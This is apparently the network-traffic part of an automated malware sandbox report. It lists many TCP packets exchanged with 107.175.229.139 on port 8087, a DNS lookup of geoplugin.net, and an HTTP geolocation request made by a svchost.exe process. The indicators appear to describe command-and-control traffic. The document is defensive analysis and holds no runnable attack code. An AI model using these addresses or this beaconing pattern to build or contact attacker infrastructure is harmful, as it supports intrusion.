Jul 3, 2024 14:50:57.053975105 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.053989887 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.054012060 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.054044008 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.054424047 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.054480076 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.054491997 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.054544926 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.054615021 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.054626942 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.054637909 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.054651022 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.054655075 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.054677010 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.054860115 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.054876089 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.054887056 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.054898024 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.054908991 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.054915905 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.054924011 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.054949045 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.055413008 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.055459023 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.055509090 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.055521011 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.055561066 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.056080103 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.056099892 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.056111097 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.056143045 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.056260109 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.056271076 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.056281090 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.056293964 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.056302071 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.056349039 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.056458950 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.056469917 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.056493044 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.056503057 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.056504965 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.056514025 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.056525946 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.056545973 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.056559086 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.056633949 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.056718111 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.067440987 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.067749977 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.067760944 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.067771912 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.067783117 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.067800045 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.067812920 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.067820072 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.067823887 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.067837954 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.067848921 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.067848921 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.067859888 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.067877054 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.067903996 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.068160057 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.068170071 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.068181992 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.068192959 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.068203926 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.068214893 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.068222046 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.068253040 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.068435907 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.068447113 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.068458080 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.068468094 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.068485022 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.068480015 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.068500042 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.068520069 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.068547964 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.131690979 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.131712914 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.131722927 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.131793022 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.131850958 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.131861925 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.131871939 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.131894112 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.131903887 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.131933928 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.139153004 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.139192104 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.139203072 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.139224052 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.139251947 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.139343023 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.139353037 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.139367104 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.139379025 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.139396906 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.139415979 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.139585018 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.139595985 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.139605999 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.139616013 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.139626026 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.139636040 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.139647007 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.139647007 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.139676094 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.139883041 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.139930964 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.140006065 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.140017033 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.140029907 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.140041113 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.140050888 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.140079975 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.140261889 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.140273094 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.140324116 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.140331030 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.140342951 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.140352964 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.140364885 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.140364885 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.140371084 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.140379906 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.140407085 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.140839100 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.140849113 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.140858889 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.140868902 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.140880108 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.140883923 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.140885115 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.140891075 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.140899897 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.140908003 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.140911102 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.140921116 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.140932083 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.140939951 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.140961885 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.140978098 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.141287088 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.141297102 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.141307116 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.141318083 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.141331911 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.141362906 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.141370058 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.141381025 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.141386032 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.141395092 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.141401052 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.141411066 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.141421080 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.141432047 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.141432047 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.141443014 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.141453981 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.141458988 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.141473055 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.141504049 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.142113924 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.142124891 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.142137051 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.142147064 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.142158031 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.142167091 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.142183065 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.142193079 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.142195940 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.142195940 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.142205000 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.142215967 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.142226934 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.142235994 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.142239094 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.142242908 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.142254114 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.142258883 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.142260075 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.142270088 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.142280102 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.142308950 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.142339945 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.143673897 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.143723011 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.143755913 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.143767118 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.143802881 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.143811941 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.143822908 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.143858910 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.143933058 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.143944025 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.143984079 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.144058943 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.144069910 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.144081116 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.144092083 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.144098997 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.144105911 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.144125938 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.144318104 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.144329071 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.144360065 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.155400991 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.155411959 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.155421972 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.155472040 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.155488968 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.155489922 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.155527115 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.155536890 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.155564070 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.155680895 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.155690908 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.155699015 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.155723095 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.155731916 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.155925035 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.155935049 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.155944109 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.155952930 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.155961990 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.155966043 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.155972004 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.155982018 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.156006098 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.156232119 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.156240940 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.156250954 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.156260014 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.156270027 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.156378031 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.219360113 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.219392061 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.219403028 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.219491005 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.219511986 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.219525099 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.219569921 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.219589949 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.219600916 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.219624043 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.219640017 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.219665051 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.227024078 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.227077007 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.227087975 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.227138996 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.227226973 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.227241993 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.227252960 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.227267027 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.227277994 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.227298021 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.227487087 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.227503061 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.227514982 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.227524996 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.227535963 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.227545977 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.227556944 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.227556944 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.227567911 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.227569103 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.227579117 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.227606058 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.227626085 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.227869987 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.228056908 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.228071928 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.228081942 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.228092909 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.228104115 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.228110075 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.228115082 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.228125095 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.228130102 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.228137016 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.228147984 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.228148937 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.228163004 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.228168011 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.228178978 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.228189945 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.228193045 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.228200912 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.228218079 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.228244066 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.228684902 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.228697062 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.228708029 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.228718996 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.228730917 CEST	8087	49738	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:57.228739977 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.228775024 CEST	49738	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:57.768867016 CEST	80	49739	178.237.33.50	192.168.2.4
Jul 3, 2024 14:50:57.772344112 CEST	49739	80	192.168.2.4	178.237.33.50
Jul 3, 2024 14:50:58.084810019 CEST	8087	49737	107.175.229.139	192.168.2.4
Jul 3, 2024 14:50:58.140093088 CEST	49737	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:58.247493029 CEST	49737	8087	192.168.2.4	107.175.229.139
Jul 3, 2024 14:50:58.252459049 CEST	8087	49737	107.175.229.139	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 3, 2024 14:50:56.142766953 CEST	61833	53	192.168.2.4	1.1.1.1
Jul 3, 2024 14:50:56.151134968 CEST	53	61833	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 3, 2024 14:50:56.142766953 CEST	192.168.2.4	1.1.1.1	0x143a	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 3, 2024 14:50:56.151134968 CEST	1.1.1.1	192.168.2.4	0x143a	No error (0)	geoplugin.net		178.237.33.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

geoplugin.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49739	178.237.33.50	80	8084	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 14:50:56.163086891 CEST	71	OUT	GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
